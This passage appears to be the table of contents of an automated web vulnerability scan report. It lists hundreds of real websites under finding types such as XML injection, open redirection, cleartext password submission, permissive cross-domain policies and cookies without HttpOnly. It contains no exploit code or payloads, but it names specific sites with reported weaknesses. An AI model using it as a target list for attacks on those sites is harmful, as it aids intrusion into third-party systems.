7.394. http://www.pogo.com/crossdomain.xml

7.395. http://www.politico.com/crossdomain.xml

7.396. http://www.politicsdaily.com/crossdomain.xml

7.397. http://www.poptropica.com/crossdomain.xml

7.398. http://www.potterybarn.com/crossdomain.xml

7.399. http://www.progressive.com/crossdomain.xml

7.400. http://www.psu.edu/crossdomain.xml

7.401. http://www.realage.com/crossdomain.xml

7.402. http://www.rei.com/crossdomain.xml

7.403. http://www.reuters.com/crossdomain.xml

7.404. http://www.reverbnation.com/crossdomain.xml

7.405. http://www.rightathome.com/crossdomain.xml

7.406. http://www.rivals.com/crossdomain.xml

7.407. http://www.rockyou.com/crossdomain.xml

7.408. http://www.rotoworld.com/crossdomain.xml

7.409. http://www.rottentomatoes.com/crossdomain.xml

7.410. http://www.roxwel.com/crossdomain.xml

7.411. http://www.salesforce.com/crossdomain.xml

7.412. http://www.salon.com/crossdomain.xml

7.413. http://www.scholastic.com/crossdomain.xml

7.414. http://www.sears.com/crossdomain.xml

7.415. http://www.seattlepi.com/crossdomain.xml

7.416. http://www.shangri-la.com/crossdomain.xml

7.417. http://www.shopathome.com/crossdomain.xml

7.418. http://www.shopstyle.com/crossdomain.xml

7.419. http://www.shutterfly.com/crossdomain.xml

7.420. http://www.simon.com/crossdomain.xml

7.421. http://www.simplyhired.com/crossdomain.xml

7.422. http://www.sixflags.com/crossdomain.xml

7.423. http://www.sky.com/crossdomain.xml

7.424. http://www.skype.com/crossdomain.xml

7.425. http://www.slate.com/crossdomain.xml

7.426. http://www.slide.com/crossdomain.xml

7.427. http://www.smarter.com/crossdomain.xml

7.428. http://www.smilebox.com/crossdomain.xml

7.429. http://www.smileycentral.com/crossdomain.xml

7.430. http://www.snapfish.com/crossdomain.xml

7.431. http://www.softonic.com/crossdomain.xml

7.432. http://www.spanishdict.com/crossdomain.xml

7.433. http://www.spellingcity.com/crossdomain.xml

7.434. http://www.sportsauthority.com/crossdomain.xml

7.435. http://www.star-telegram.com/crossdomain.xml

7.436. http://www.startribune.com/crossdomain.xml

7.437. http://www.stumbleupon.com/crossdomain.xml

7.438. http://www.stylelist.com/crossdomain.xml

7.439. http://www.superpages.com/crossdomain.xml

7.440. http://www.symantec.com/crossdomain.xml

7.441. http://www.t-mobile.com/crossdomain.xml

7.442. http://www.tagged.com/crossdomain.xml

7.443. http://www.target.com/crossdomain.xml

7.444. http://www.tarot.com/crossdomain.xml

7.445. http://www.tasteofhome.com/crossdomain.xml

7.446. http://www.telegraph.co.uk/crossdomain.xml

7.447. http://www.thefrisky.com/crossdomain.xml

7.448. http://www.thirdage.com/crossdomain.xml

7.449. http://www.ticketmaster.com/crossdomain.xml

7.450. http://www.tigerdirect.com/crossdomain.xml

7.451. http://www.tinypic.com/crossdomain.xml

7.452. http://www.tmz.com/crossdomain.xml

7.453. http://www.toptenreviews.com/crossdomain.xml

7.454. http://www.toyota.com/crossdomain.xml

7.455. http://www.toysrus.com/crossdomain.xml

7.456. http://www.tracfone.com/crossdomain.xml

7.457. http://www.travelocity.com/crossdomain.xml

7.458. http://www.tripadvisor.com/crossdomain.xml

7.459. http://www.true.com/crossdomain.xml

7.460. http://www.trulia.com/crossdomain.xml

7.461. http://www.tv.com/crossdomain.xml

7.462. http://www.tvguide.com/crossdomain.xml

7.463. http://www.univision.com/crossdomain.xml

7.464. http://www.ups.com/crossdomain.xml

7.465. http://www.usatoday.com/crossdomain.xml

7.466. http://www.use.com/crossdomain.xml

7.467. http://www.usgs.gov/crossdomain.xml

7.468. http://www.usmagazine.com/crossdomain.xml

7.469. http://www.vast.com/crossdomain.xml

7.470. http://www.verizon.net/crossdomain.xml

7.471. http://www.victoriassecret.com/crossdomain.xml

7.472. http://www.videobash.com/crossdomain.xml

7.473. http://www.walletpop.com/crossdomain.xml

7.474. http://www.walmart.com/crossdomain.xml

7.475. http://www.warnerbros.com/crossdomain.xml

7.476. http://www.washingtonpost.com/crossdomain.xml

7.477. http://www.weather.com/crossdomain.xml

7.478. http://www.webshots.com/crossdomain.xml

7.479. http://www.weightwatchers.com/crossdomain.xml

7.480. http://www.wetpaint.com/crossdomain.xml

7.481. http://www.whitehouse.gov/crossdomain.xml

7.482. http://www.wimp.com/crossdomain.xml

7.483. http://www.wn.com/crossdomain.xml

7.484. http://www.womansday.com/crossdomain.xml

7.485. http://www.worldwinner.com/crossdomain.xml

7.486. http://www.wsbtv.com/crossdomain.xml

7.487. http://www.wwe.com/crossdomain.xml

7.488. http://www.yallwire.com/crossdomain.xml

7.489. http://www.yellowpages.com/crossdomain.xml

7.490. http://www.yontoo.com/crossdomain.xml

7.491. http://www.zap2it.com/crossdomain.xml

7.492. http://www.zappos.com/crossdomain.xml

7.493. http://www.zazzle.com/crossdomain.xml

7.494. http://www.zmags.com/crossdomain.xml

7.495. http://www.zshare.net/crossdomain.xml

7.496. http://www.zwinky.com/crossdomain.xml

7.497. http://www.zynga.com/crossdomain.xml

7.498. http://www.active.com/crossdomain.xml

7.499. http://www.allmenus.com/crossdomain.xml

7.500. http://www.autotrader.com/crossdomain.xml

7.501. http://www.autotraderstatic.com/crossdomain.xml

7.502. http://www.blackplanet.com/crossdomain.xml

7.503. http://www.boston.com/crossdomain.xml

7.504. http://www.christianbook.com/crossdomain.xml

7.505. http://www.chuckecheese.com/crossdomain.xml

7.506. http://www.cincinnati.com/crossdomain.xml

7.507. http://www.continental.com/crossdomain.xml

7.508. http://www.deadline.com/crossdomain.xml

7.509. http://www.deviantart.com/crossdomain.xml

7.510. http://www.dreamstime.com/crossdomain.xml

7.511. http://www.elyrics.net/crossdomain.xml

7.512. http://www.elyricsworld.com/crossdomain.xml

7.513. http://www.epicurious.com/crossdomain.xml

7.514. http://www.greatschools.org/crossdomain.xml

7.515. http://www.icontact.com/crossdomain.xml

7.516. http://www.inbox.com/crossdomain.xml

7.517. http://www.iwon.com/crossdomain.xml

7.518. http://www.justluxe.com/crossdomain.xml

7.519. http://www.kazaa.com/crossdomain.xml

7.520. http://www.kodak.com/crossdomain.xml

7.521. http://www.livejournal.com/crossdomain.xml

7.522. http://www.loc.gov/crossdomain.xml

7.523. http://www.lowfares.com/crossdomain.xml

7.524. http://www.lyricsmode.com/crossdomain.xml

7.525. http://www.marriott.com/crossdomain.xml

7.526. http://www.michaels.com/crossdomain.xml

7.527. http://www.mlive.com/crossdomain.xml

7.528. http://www.motime.com/crossdomain.xml

7.529. http://www.movietickets.com/crossdomain.xml

7.530. http://www.orbitz.com/crossdomain.xml

7.531. http://www.panoramio.com/crossdomain.xml

7.532. http://www.phoenix.edu/crossdomain.xml

7.533. http://www.playdom.com/crossdomain.xml

7.534. http://www.regions.com/crossdomain.xml

7.535. http://www.rr.com/crossdomain.xml

7.536. http://www.sacbee.com/crossdomain.xml

7.537. http://www.sharebuilder.com/crossdomain.xml

7.538. http://www.stltoday.com/crossdomain.xml

7.539. http://www.stlyrics.com/crossdomain.xml

7.540. http://www.talkingpointsmemo.com/crossdomain.xml

7.541. http://www.tamu.edu/crossdomain.xml

7.542. http://www.thisis50.com/crossdomain.xml

7.543. http://www.thomasnet.com/crossdomain.xml

7.544. http://www.tradekey.com/crossdomain.xml

7.545. http://www.umich.edu/crossdomain.xml

7.546. http://www.verisign.com/crossdomain.xml

7.547. http://www.vimeo.com/crossdomain.xml

7.548. http://www.vistaprint.com/crossdomain.xml

7.549. http://www.walgreens.com/crossdomain.xml

7.550. http://www.xe.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://s0.2mdn.net/clientaccesspolicy.xml

8.3. http://www.cbssports.com/clientaccesspolicy.xml

8.4. http://www.coveritlive.com/clientaccesspolicy.xml

8.5. http://www.intellicast.com/clientaccesspolicy.xml

8.6. http://www.nadaguides.com/clientaccesspolicy.xml

8.7. http://www.ncm.com/clientaccesspolicy.xml

8.8. http://www.opinionshere.com/clientaccesspolicy.xml

8.9. http://www.safelinkwireless.com/clientaccesspolicy.xml

8.10. http://www.usatoday.com/clientaccesspolicy.xml

8.11. http://www.winbuyer.com/clientaccesspolicy.xml

8.12. http://www.cbs.com/clientaccesspolicy.xml

8.13. http://www.cnbc.com/clientaccesspolicy.xml

8.14. http://www.fidelity.com/clientaccesspolicy.xml

8.15. http://www.indiatimes.com/clientaccesspolicy.xml

8.16. http://www.msnbc.com/clientaccesspolicy.xml

8.17. http://www.nationalgeographic.com/clientaccesspolicy.xml

8.18. http://www.sky.com/clientaccesspolicy.xml

8.19. http://www.xbox.com/clientaccesspolicy.xml

8.20. http://www.kmart.com/clientaccesspolicy.xml

8.21. http://www.sears.com/clientaccesspolicy.xml

8.22. http://www.usa.gov/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://www.collegehumor.com/favicon.ico

9.2. http://www.popularscreensavers.com/favicon.ico

9.3. http://www.popularscreensavers.com/favicon.ico

9.4. http://www.popularscreensavers.com/favicon.ico

10. XML injection

10.1. http://www.4shared.com/favicon.ico [REST URL parameter 1]

10.2. http://www.altervista.org/favicon.ico [REST URL parameter 1]

10.3. http://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1]

10.4. http://www.bizrate.com/favicon.ico [REST URL parameter 1]

10.5. http://www.bravotv.com/favicon.ico [REST URL parameter 1]

10.6. http://www.columbia.edu/favicon.ico [REST URL parameter 1]

10.7. http://www.consumersearch.com/favicon.ico [REST URL parameter 1]

10.8. http://www.dickssportinggoods.com/favicon.ico [REST URL parameter 1]

10.9. http://www.diynetwork.com/favicon.ico [REST URL parameter 1]

10.10. http://www.ehow.co.uk/favicon.ico [REST URL parameter 1]

10.11. http://www.examiner.com/favicon.ico [REST URL parameter 1]

10.12. http://www.foodnetwork.com/favicon.ico [REST URL parameter 1]

10.13. http://www.hollywoodlife.com/favicon.ico [REST URL parameter 1]

10.14. http://www.house.gov/favicon.ico [REST URL parameter 1]

10.15. http://www.k12.com/favicon.ico [REST URL parameter 1]

10.16. http://www.kazaa.com/favicon.ico [REST URL parameter 1]

10.17. http://www.macrumors.com/favicon.ico [REST URL parameter 1]

10.18. http://www.orbitz.com/favicon.ico [REST URL parameter 1]

10.19. http://www.psu.edu/favicon.ico [REST URL parameter 1]

10.20. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

10.21. http://www.southwest.com/favicon.ico [REST URL parameter 1]

10.22. http://www.ufl.edu/favicon.ico [REST URL parameter 1]

10.23. http://www.ultimate-guitar.com/favicon.ico [REST URL parameter 1]

10.24. http://www.usgs.gov/favicon.ico [REST URL parameter 1]

10.25. http://www.where2getit.com/favicon.ico [REST URL parameter 1]

10.26. http://www.wimp.com/favicon.ico [REST URL parameter 1]

10.27. http://www.wunderground.com/favicon.ico [REST URL parameter 1]

11. ASP.NET ViewState without MAC enabled

12. Open redirection

12.1. http://www.lalate.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.2. http://www.outsidehub.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.3. http://www.paypal-shopping.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.4. http://www.swipebids.com/favicon.ico [REST URL parameter 1]

12.5. http://www.swipebids.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.6. http://www.virtuagirlhd.com/favicon.ico [name of an arbitrarily supplied request parameter]

13. Cookie scoped to parent domain

13.1. http://www.androidcentral.com/favicon.ico

13.2. http://www.easybib.com/favicon.ico

13.3. http://www.evite.com/favicon.ico

13.4. http://www.genealogy.com/favicon.ico

13.5. http://www.mapquest.com/favicon.ico

13.6. http://www.mayoclinic.com/favicon.ico

13.7. http://www.musiciansfriend.com/favicon.ico

13.8. http://www.ning.com/favicon.ico

13.9. http://www.pronto.com/favicon.ico

13.10. http://www.softonic.com/favicon.ico

13.11. http://www.thisis50.com/favicon.ico

13.12. http://www.worthpoint.com/favicon.ico

13.13. http://maps.google.com/maps

13.14. http://maps.google.com/maps/gen_204

13.15. http://maps.google.com/maps/vp

13.16. http://safebrowsing.clients.google.com/safebrowsing/downloads

13.17. http://translate.google.com/translate_a/element.js

13.18. http://www.411.com/favicon.ico

13.19. http://www.addresses.com/favicon.ico

13.20. http://www.advanceautoparts.com/favicon.ico

13.21. http://www.alibaba.com/favicon.ico

13.22. http://www.americanexpress.com/favicon.ico

13.23. http://www.apartments.com/favicon.ico

13.24. http://www.automotive.com/favicon.ico

13.25. http://www.autotrader.com/favicon.ico

13.26. http://www.baidu.com/favicon.ico

13.27. http://www.bidcactus.com/favicon.ico

13.28. http://www.bizjournals.com/favicon.ico

13.29. http://www.buzznet.com/favicon.ico

13.30. http://www.cisco.com/favicon.ico

13.31. http://www.collegehumor.com/favicon.ico

13.32. http://www.cornell.edu/favicon.ico

13.33. http://www.directv.com/favicon.ico

13.34. http://www.discovercard.com/favicon.ico

13.35. http://www.eharmony.com/favicon.ico

13.36. http://www.emedtv.com/favicon.ico

13.37. http://www.epinions.com/favicon.ico

13.38. http://www.fedex.com/favicon.ico

13.39. http://www.fool.com/favicon.ico

13.40. http://www.funbrain.com/favicon.ico

13.41. http://www.gamehouse.com/favicon.ico

13.42. http://www.guardian.co.uk/favicon.ico

13.43. http://www.hayneedle.com/favicon.ico

13.44. http://www.hiexpress.com/favicon.ico

13.45. http://www.holidayinn.com/favicon.ico

13.46. http://www.hsn.com/favicon.ico

13.47. http://www.ichotelsgroup.com/favicon.ico

13.48. http://www.imageshack.us/favicon.ico

13.49. http://www.know-where.com/favicon.ico

13.50. http://www.life123.com/favicon.ico

13.51. http://www.lingospot.com/favicon.ico

13.52. http://www.marykay.com/favicon.ico

13.53. http://www.mbnanetaccess.com/favicon.ico

13.54. http://www.metropcs.com/favicon.ico

13.55. http://www.motortrend.com/favicon.ico

13.56. http://www.netflix.com/favicon.ico

13.57. http://www.nintendo.com/favicon.ico

13.58. http://www.nytimes.com/favicon.ico

13.59. http://www.officedepot.com/favicon.ico

13.60. http://www.okcupid.com/favicon.ico

13.61. http://www.pbs.org/favicon.ico

13.62. http://www.pizzahut.com/favicon.ico

13.63. http://www.playlist.com/favicon.ico

13.64. http://www.potterybarn.com/favicon.ico

13.65. http://www.progressive.com/favicon.ico

13.66. http://www.qvc.com/favicon.ico

13.67. http://www.qwest.com/favicon.ico

13.68. http://www.seniorpeoplemeet.com/favicon.ico

13.69. http://www.sfgate.com/favicon.ico

13.70. http://www.sharebuilder.com/favicon.ico

13.71. http://www.terra.com/favicon.ico

13.72. http://www.thefind.com/favicon.ico

13.73. http://www.thehollywoodgossip.com/favicon.ico

13.74. http://www.ticketmaster.com/favicon.ico

13.75. http://www.travelocity.com/favicon.ico

13.76. http://www.true.com/favicon.ico

13.77. http://www.uhaul.com/favicon.ico

13.78. http://www.united.com/favicon.ico

13.79. http://www.veoh.com/favicon.ico

13.80. http://www.verisign.com/favicon.ico

13.81. http://www.virtualtourist.com/favicon.ico

13.82. http://www.vistaprint.com/favicon.ico

13.83. http://www.wachovia.com/favicon.ico

13.84. http://www.warnerbros.com/favicon.ico

13.85. http://www.wellsfargo.com/favicon.ico

13.86. http://www.whitepages.com/favicon.ico

13.87. http://www.wsbtv.com/favicon.ico

13.88. http://www.yellowpages.com/favicon.ico

14. Cookie without HttpOnly flag set

14.1. http://www.androidcentral.com/favicon.ico

14.2. http://www.aon.com/favicon.ico

14.3. http://www.biglots.com/favicon.ico

14.4. http://www.bullishbankers.com/favicon.ico

14.5. http://www.centurylink.com/favicon.ico

14.6. http://www.chacha.com/favicon.ico

14.7. http://www.emedicinehealth.com/favicon.ico

14.8. http://www.evite.com/favicon.ico

14.9. http://www.freeridegames.com/favicon.ico

14.10. http://www.genealogy.com/favicon.ico

14.11. http://www.gofreecredit.com/favicon.ico

14.12. http://www.hayneedle.com/favicon.ico

14.13. http://www.kaboodle.com/favicon.ico

14.14. http://www.livevideo.com/favicon.ico

14.15. http://www.lowermybills.com/favicon.ico

14.16. http://www.lyrics.com/favicon.ico

14.17. http://www.mapquest.com/favicon.ico

14.18. http://www.mayoclinic.com/favicon.ico

14.19. http://www.medicinenet.com/favicon.ico

14.20. http://www.mrmovietimes.com/favicon.ico

14.21. http://www.musiciansfriend.com/favicon.ico

14.22. http://www.ncnetwork.net/favicon.ico

14.23. http://www.ning.com/favicon.ico

14.24. http://www.popularscreensavers.com/favicon.ico

14.25. http://www.prioritymail.com/favicon.ico

14.26. http://www.pronto.com/favicon.ico

14.27. http://www.questia.com/favicon.ico

14.28. http://www.rxlist.com/favicon.ico

14.29. http://www.softonic.com/favicon.ico

14.30. http://www.suntimes.com/favicon.ico

14.31. http://www.thegrids.info/favicon.ico

14.32. http://www.thisis50.com/favicon.ico

14.33. http://www.travel-ticker.com/favicon.ico

14.34. http://www.usajobs.gov/favicon.ico

14.35. http://www.verizon.net/favicon.ico

14.36. http://www.websitealive.com/favicon.ico

14.37. http://www.wellness.com/favicon.ico

14.38. http://www.wendys.com/favicon.ico

14.39. http://www.windows.com/favicon.ico

14.40. http://www.worthpoint.com/favicon.ico

14.41. http://maps.google.com/maps

14.42. http://maps.google.com/maps/gen_204

14.43. http://maps.google.com/maps/vp

14.44. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.45. http://smp.adviva.net/track/v=4

14.46. http://translate.google.com/translate_a/element.js

14.47. http://www.2wire.net/favicon.ico

14.48. http://www.411.com/favicon.ico

14.49. http://www.4shared.com/favicon.ico

14.50. http://www.aarp.org/favicon.ico

14.51. http://www.aboutus.org/favicon.ico

14.52. http://www.addresses.com/favicon.ico

14.53. http://www.adp.com/favicon.ico

14.54. http://www.advanceautoparts.com/favicon.ico

14.55. http://www.alibaba.com/favicon.ico

14.56. http://www.americanexpress.com/favicon.ico

14.57. http://www.americantowns.com/favicon.ico

14.58. http://www.apartmentratings.com/favicon.ico

14.59. http://www.apartments.com/favicon.ico

14.60. http://www.automotive.com/favicon.ico

14.61. http://www.autotrader.com/favicon.ico

14.62. http://www.autozone.com/favicon.ico

14.63. http://www.away.com/favicon.ico

14.64. http://www.baidu.com/favicon.ico

14.65. http://www.bankofamerica.com/favicon.ico

14.66. http://www.bbt.com/favicon.ico

14.67. http://www.bidcactus.com/favicon.ico

14.68. http://www.bizjournals.com/favicon.ico

14.69. http://www.blogrolling.com/favicon.ico

14.70. http://www.business.com/favicon.ico

14.71. http://www.buzznet.com/favicon.ico

14.72. http://www.carmax.com/favicon.ico

14.73. http://www.cars.com/favicon.ico

14.74. http://www.cheapoair.com/favicon.ico

14.75. http://www.cheaptickets.com/favicon.ico

14.76. http://www.cisco.com/favicon.ico

14.77. http://www.classesusa.com/favicon.ico

14.78. http://www.cnn.com/favicon.ico

14.79. http://www.collegeconfidential.com/favicon.ico

14.80. http://www.collegehumor.com/favicon.ico

14.81. http://www.collegesurfing.com/favicon.ico

14.82. http://www.comcast.com/favicon.ico

14.83. http://www.contacthr.com/favicon.ico

14.84. http://www.cornell.edu/favicon.ico

14.85. http://www.coupons.com/favicon.ico

14.86. http://www.cracked.com/favicon.ico

14.87. http://www.curse.com/favicon.ico

14.88. http://www.cyberdefender.com/favicon.ico

14.89. http://www.dallasnews.com/favicon.ico

14.90. http://www.dealer.com/favicon.ico

14.91. http://www.deere.com/favicon.ico

14.92. http://www.directv.com/favicon.ico

14.93. http://www.discovercard.com/favicon.ico

14.94. http://www.doityourself.com/favicon.ico

14.95. http://www.drugstore.com/favicon.ico

14.96. http://www.eharmony.com/favicon.ico

14.97. http://www.ehealthforum.com/favicon.ico

14.98. http://www.emedtv.com/favicon.ico

14.99. http://www.epinions.com/favicon.ico

14.100. http://www.factmonster.com/favicon.ico

14.101. http://www.familydoctor.org/favicon.ico

14.102. http://www.fedex.com/favicon.ico

14.103. http://www.fool.com/favicon.ico

14.104. http://www.frontier.com/favicon.ico

14.105. http://www.funbrain.com/favicon.ico

14.106. http://www.gamehouse.com/favicon.ico

14.107. http://www.gifts.com/favicon.ico

14.108. http://www.guardian.co.uk/favicon.ico

14.109. http://www.guitarcenter.com/favicon.ico

14.110. http://www.gunbroker.com/favicon.ico

14.111. http://www.healthgrades.com/favicon.ico

14.112. http://www.hi5.com/favicon.ico

14.113. http://www.hiexpress.com/favicon.ico

14.114. http://www.holidayinn.com/favicon.ico

14.115. http://www.hotpads.com/favicon.ico

14.116. http://www.hsbccreditcard.com/favicon.ico

14.117. http://www.hsn.com/favicon.ico

14.118. http://www.hubspot.com/favicon.ico

14.119. http://www.ichotelsgroup.com/favicon.ico

14.120. http://www.imageshack.us/favicon.ico

14.121. http://www.in.gov/favicon.ico

14.122. http://www.info.com/favicon.ico

14.123. http://www.infoplease.com/favicon.ico

14.124. http://www.informationgetter.com/favicon.ico

14.125. http://www.intelius.com/favicon.ico

14.126. http://www.investopedia.com/favicon.ico

14.127. http://www.iwon.com/favicon.ico

14.128. http://www.joann.com/favicon.ico

14.129. http://www.jstor.org/favicon.ico

14.130. http://www.kaspersky.com/favicon.ico

14.131. http://www.kbb.com/favicon.ico

14.132. http://www.kcom.com/

14.133. http://www.kcom.com/contact-us/

14.134. http://www.kcom.com/contact-us/brighton

14.135. http://www.kcom.com/large-enterprise/

14.136. http://www.know-where.com/favicon.ico

14.137. http://www.kosmix.com/favicon.ico

14.138. http://www.life123.com/favicon.ico

14.139. http://www.lingospot.com/favicon.ico

14.140. http://www.livenation.com/favicon.ico

14.141. http://www.livescience.com/favicon.ico

14.142. http://www.marykay.com/favicon.ico

14.143. http://www.mbnanetaccess.com/favicon.ico

14.144. http://www.medscape.com/favicon.ico

14.145. http://www.merck.com/favicon.ico

14.146. http://www.modelmayhem.com/favicon.ico

14.147. http://www.motime.com/favicon.ico

14.148. http://www.motortrend.com/favicon.ico

14.149. http://www.mynewplace.com/favicon.ico

14.150. http://www.newegg.com/favicon.ico

14.151. http://www.nintendo.com/favicon.ico

14.152. http://www.nydailynews.com/favicon.ico

14.153. http://www.nymag.com/favicon.ico

14.154. http://www.nytimes.com/favicon.ico

14.155. http://www.officedepot.com/favicon.ico

14.156. http://www.okcupid.com/favicon.ico

14.157. http://www.olivegarden.com/favicon.ico

14.158. http://www.onemanga.com/favicon.ico

14.159. http://www.openforum.com/favicon.ico

14.160. http://www.opinionshere.com/favicon.ico

14.161. http://www.orbitz.com/favicon.ico

14.162. http://www.orchardbank.com/favicon.ico

14.163. http://www.outdoorchannel.com/favicon.ico

14.164. http://www.pbs.org/favicon.ico

14.165. http://www.peekyou.com/favicon.ico

14.166. http://www.peoplelookup.com/favicon.ico

14.167. http://www.pizzahut.com/favicon.ico

14.168. http://www.playlist.com/favicon.ico

14.169. http://www.pnc.com/favicon.ico

14.170. http://www.potterybarn.com/favicon.ico

14.171. http://www.pricegrabber.com/favicon.ico

14.172. http://www.progressive.com/favicon.ico

14.173. http://www.purdue.edu/favicon.ico

14.174. http://www.qualityhealth.com/favicon.ico

14.175. http://www.qvc.com/favicon.ico

14.176. http://www.qwest.com/favicon.ico

14.177. http://www.regions.com/favicon.ico

14.178. http://www.reverbnation.com/favicon.ico

14.179. http://www.righthealth.com/favicon.ico

14.180. http://www.searchassist.com/favicon.ico

14.181. http://www.sfgate.com/favicon.ico

14.182. http://www.sharebuilder.com/favicon.ico

14.183. http://www.shoebuy.com/favicon.ico

14.184. http://www.shutterfly.com/favicon.ico

14.185. http://www.snapfish.com/favicon.ico

14.186. http://www.space.com/favicon.ico

14.187. http://www.staples.com/favicon.ico

14.188. http://www.straighttalk.com/favicon.ico

14.189. http://www.suite101.com/favicon.ico

14.190. http://www.terra.com/favicon.ico

14.191. http://www.thefind.com/favicon.ico

14.192. http://www.theglobeandmail.com/favicon.ico

14.193. http://www.thehollywoodgossip.com/favicon.ico

14.194. http://www.thinkquest.org/favicon.ico

14.195. http://www.ticketmaster.com/favicon.ico

14.196. http://www.totalbeauty.com/favicon.ico

14.197. http://www.tracfone.com/favicon.ico

14.198. http://www.travelocity.com/favicon.ico

14.199. http://www.true.com/favicon.ico

14.200. http://www.tvtxtr.com/favicon.ico

14.201. http://www.uhaul.com/favicon.ico

14.202. http://www.united.com/favicon.ico

14.203. http://www.usa-people-search.com/favicon.ico

14.204. http://www.veoh.com/favicon.ico

14.205. http://www.verisign.com/favicon.ico

14.206. http://www.videobash.com/favicon.ico

14.207. http://www.virtualtourist.com/favicon.ico

14.208. http://www.vistaprint.com/favicon.ico

14.209. http://www.wachovia.com/favicon.ico

14.210. http://www.warnerbros.com/favicon.ico

14.211. http://www.webs.com/favicon.ico

14.212. http://www.wellsfargo.com/favicon.ico

14.213. http://www.whitepages.com/favicon.ico

14.214. http://www.wildgames.com/favicon.ico

14.215. http://www.wirefly.com/favicon.ico

14.216. http://www.wsbtv.com/favicon.ico

14.217. http://www.xe.com/favicon.ico

14.218. http://www.yellowpages.com/favicon.ico

14.219. http://www.zillow.com/favicon.ico

15. Password field with autocomplete enabled

15.1. http://www.collegehumor.com/favicon.ico

15.2. http://www.popularscreensavers.com/favicon.ico

15.3. http://www.popularscreensavers.com/favicon.ico

15.4. http://www.popularscreensavers.com/favicon.ico

16. ASP.NET debugging enabled

16.1. http://www.blogtv.com/Default.aspx

16.2. http://www.clearchannel.com/Default.aspx

16.3. http://www.findlocation.com/Default.aspx

16.4. http://www.investopedia.com/Default.aspx

16.5. http://www.medicare.gov/Default.aspx

16.6. http://www.netquote.com/Default.aspx

16.7. http://www.newegg.com/Default.aspx

16.8. http://www.pch.com/Default.aspx

16.9. http://www.plentyoffish.com/Default.aspx

16.10. http://www.pricegong.com/Default.aspx

16.11. http://www.shopperreports.com/Default.aspx

16.12. http://www.tidaltv.com/Default.aspx

16.13. http://www.weatherbug.com/Default.aspx

16.14. http://www.wellness.com/Default.aspx

16.15. http://www.winbuyer.com/Default.aspx

17. Referer-dependent response

18. Cross-domain POST

18.1. http://www.kcom.com/contact-us/

18.2. http://www.realsimple.com/favicon.ico

19. Cross-domain Referer leakage

19.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

19.2. http://fls.doubleclick.net/activityi

19.3. http://fls.doubleclick.net/activityi

19.4. http://googleads.g.doubleclick.net/pagead/ads

19.5. http://googleads.g.doubleclick.net/pagead/ads

19.6. http://googleads.g.doubleclick.net/pagead/ads

19.7. http://googleads.g.doubleclick.net/pagead/ads

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. http://googleads.g.doubleclick.net/pagead/ads

19.11. http://googleads.g.doubleclick.net/pagead/ads

19.12. http://googleads.g.doubleclick.net/pagead/ads

19.13. http://googleads.g.doubleclick.net/pagead/ads

19.14. http://googleads.g.doubleclick.net/pagead/ads

19.15. http://googleads.g.doubleclick.net/pagead/ads

19.16. http://googleads.g.doubleclick.net/pagead/ads

19.17. http://googleads.g.doubleclick.net/pagead/ads

19.18. http://googleads.g.doubleclick.net/pagead/ads

19.19. http://googleads.g.doubleclick.net/pagead/ads

19.20. http://googleads.g.doubleclick.net/pagead/ads

19.21. http://googleads.g.doubleclick.net/pagead/ads

19.22. http://googleads.g.doubleclick.net/pagead/ads

19.23. http://googleads.g.doubleclick.net/pagead/ads

19.24. http://googleads.g.doubleclick.net/pagead/ads

19.25. http://googleads.g.doubleclick.net/pagead/ads

19.26. http://googleads.g.doubleclick.net/pagead/ads

19.27. http://googleads.g.doubleclick.net/pagead/ads

19.28. http://googleads.g.doubleclick.net/pagead/ads

19.29. http://googleads.g.doubleclick.net/pagead/ads

19.30. http://googleads.g.doubleclick.net/pagead/ads

19.31. http://googleads.g.doubleclick.net/pagead/ads

19.32. http://googleads.g.doubleclick.net/pagead/ads

19.33. http://googleads.g.doubleclick.net/pagead/ads

19.34. http://googleads.g.doubleclick.net/pagead/ads

19.35. http://googleads.g.doubleclick.net/pagead/ads

19.36. http://googleads.g.doubleclick.net/pagead/ads

19.37. http://googleads.g.doubleclick.net/pagead/ads

19.38. http://googleads.g.doubleclick.net/pagead/ads

19.39. http://googleads.g.doubleclick.net/pagead/ads

19.40. http://googleads.g.doubleclick.net/pagead/ads

19.41. http://googleads.g.doubleclick.net/pagead/ads

19.42. http://googleads.g.doubleclick.net/pagead/ads

19.43. http://googleads.g.doubleclick.net/pagead/ads

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

20.2. http://fls.doubleclick.net/activityi

20.3. http://googleads.g.doubleclick.net/pagead/ads

20.4. http://googleads.g.doubleclick.net/pagead/ads

20.5. http://www.411.com/favicon.ico

20.6. http://www.800notes.com/favicon.ico

20.7. http://www.androidcentral.com/favicon.ico

20.8. http://www.biglots.com/favicon.ico

20.9. http://www.bizjournals.com/favicon.ico

20.10. http://www.blogs.com/favicon.ico

20.11. http://www.bullishbankers.com/favicon.ico

20.12. http://www.canon.com/favicon.ico

20.13. http://www.citibank.com/favicon.ico

20.14. http://www.collegehumor.com/favicon.ico

20.15. http://www.curse.com/favicon.ico

20.16. http://www.dealer.com/favicon.ico

20.17. http://www.dexknows.com/favicon.ico

20.18. http://www.ebayclassifieds.com/favicon.ico

20.19. http://www.elyricsworld.com/favicon.ico

20.20. http://www.freeridegames.com/favicon.ico

20.21. http://www.games.com/favicon.ico

20.22. http://www.guitarcenter.com/favicon.ico

20.23. http://www.hayneedle.com/favicon.ico

20.24. http://www.iloveindia.com/favicon.ico

20.25. http://www.kcom.com/contact-us/brighton

20.26. http://www.lanebryant.com/favicon.ico

20.27. http://www.life123.com/favicon.ico

20.28. http://www.menupages.com/favicon.ico

20.29. http://www.moshimonsters.com/favicon.ico

20.30. http://www.mrmovietimes.com/favicon.ico

20.31. http://www.myrecipes.com/favicon.ico

20.32. http://www.newport-news.com/favicon.ico

20.33. http://www.onemanga.com/favicon.ico

20.34. http://www.pga.com/favicon.ico

20.35. http://www.popularscreensavers.com/favicon.ico

20.36. http://www.skype.com/favicon.ico

